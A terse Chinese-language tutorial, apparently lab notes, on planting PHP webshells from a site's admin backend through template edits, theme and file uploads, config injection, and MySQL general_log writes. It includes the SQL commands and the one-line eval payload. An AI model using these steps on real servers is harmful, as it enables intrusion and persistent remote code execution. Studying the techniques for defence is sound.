后台修改模板拿WebShell
打开后点击我下方的选择
打开网站一定要记得修改大写为小写
然后就可以看到我们的一句话木马了
上传主题拿WebShell
打开后点击add new
打开网站下载一个
https://bulianglin.com/archives/snibypass.html
把这个拖出来
并写入一句话木马为eval.php
内容是一句话木马
修改的短一点名字
然后压缩
上传成功会有这个
我们打开网站就会看到成功了
通过⽂件管理器上传WebShell
登陆成功后这个页面新建文件1.php内容就是一句话木马
打开是空白就是成功了
文件上传是2.php内容也是一句话木马打开网站是空白说明成功了
后台任意命令执⾏拿WebShell
广告写入一句话木马
修改模板⽂件拿WebShell
修改主页文件为index.php可以成功
通过后台sql命令执⾏拿webshell
系统然后sql命令工具写入下面的一句木马就会在我们的根目录下生成
后台修改配置⽂件拿Shell
如果网站进不去可以尝试1:启用父路径
2:启用32位应用程序
将下图选中文件里的内容放到wwwroot里下
打开网站
文件夹里有admin_aspcms打开网站后台
打开幻灯片设置
点保存抓包并修改抓包里要修改的位置
修改成功
日志里这个位置也修改成功
复制网址
菜刀连接就会发现成功了
通过⽇志⽂件拿Shell
小皮这个位置下载
打开网站填入用户密码
在sql中输入
show global variables like '%general%';
打开日志保存状态
set global general_log='on';
修改日志的位置
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'
show global variables like '%general%';
select '<?php eval($_POST[cmd]);?>';
就可以连接成功 了
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
